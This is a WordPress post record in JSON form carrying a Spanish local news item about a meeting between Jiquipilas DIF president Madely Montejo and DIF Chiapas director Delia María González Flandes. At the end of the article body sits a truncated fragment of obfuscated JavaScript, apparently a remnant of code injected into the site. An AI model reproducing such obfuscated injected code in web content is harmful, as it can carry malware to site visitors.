{"id":9751,"date":"2023-04-26T04:24:43","date_gmt":"2023-04-26T04:24:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9751"},"modified":"2023-04-26T04:24:43","modified_gmt":"2023-04-26T04:24:43","slug":"se-reune-madely-montejo-con-directora-general-del-dif-chiapas-delia-maria-gonzalez-flandes","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9751","title":{"rendered":"Se re\u00fane Madely Montejo con Directora General del DIF Chiapas Delia Mar\u00eda Gonz\u00e1lez Flandes."},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230425-WA0055.jpg\" alt=\"\" class=\"wp-image-9752\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230425-WA0055.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230425-WA0055-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/IMG-20230425-WA0055-768x576.jpg 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 Le agradeci\u00f3 por la ayuda brindada a Jiquipilas y por los beneficios que se otorgar\u00e1n a los sectores vulnerables.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Refrend\u00f3 su compromiso de continuar trabajando de la mano y de manera coordinada con el Dif Chiapas.<\/li>\n<\/ul>\n\n\n\n<p>Jiquipilas, Chiapas. \u2013 La Presidenta del sistema DIF Madely Montejo Maza agradeci\u00f3 la atenci\u00f3n brindada por la Directora General del DIF Chiapas Delia Mar\u00eda Gonz\u00e1lez Flandes a quien le refrend\u00f3 el compromiso de seguir trabajando por el bienestar de las familias jiquipiltecas.<\/p>\n\n\n\n<p>Tras reunirse con la titular de este organismo, le agradeci\u00f3 todo la ayuda que ha brindado a Jiquipilas y le plante\u00f3 las necesidades que requieren para poder ayudar a m\u00e1s sectores en situaci\u00f3n de vulnerabilidad como son las mujeres, los ni\u00f1os y los adultos mayores.<\/p>\n\n\n\n<p>\u201cMi intenci\u00f3n es muy clara, seguir ayudando a que nuestra gente tenga mayores beneficios a trav\u00e9s de un consenso previo que permita canalizar la ayuda oportuna para que todas y todos reciban el apoyo\u201d, expuso.<\/p>\n\n\n\n<p>Desde que asum\u00ed la responsabilidad en el DIF Municipal he procurado estar atenta a las necesidades de la ciudadan\u00eda y lo hago con mucho gusto, porque es una oportunidad de contribuir con los que menos tienen, anot\u00f3 la primera dama de Jiquipilas.<\/p>\n\n\n\n<p>Madely Montejo refrend\u00f3 el compromiso en su encomienda como Presidenta del DIF para seguir gestionando programas de ayuda humanitaria y con ello demostrar que si es posible aportar ayuda a los m\u00e1s necesitados de este municipio.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Le agradeci\u00f3 por la ayuda brindada a Jiquipilas y por los beneficios que se otorgar\u00e1n a los sectores vulnerables. Refrend\u00f3 su compromiso de continuar trabajando de la mano y de manera coordinada con el Dif Chiapas. Jiquipilas, Chiapas. \u2013 La Presidenta del sistema DIF Madely Montejo Maza agradeci\u00f3 la atenci\u00f3n brindada por la Directora &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9752,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9751","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9751"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9751\/revisions"}],"predecessor-version":[{"id":9753,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9751\/revisions\/9753"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9752"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9751"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}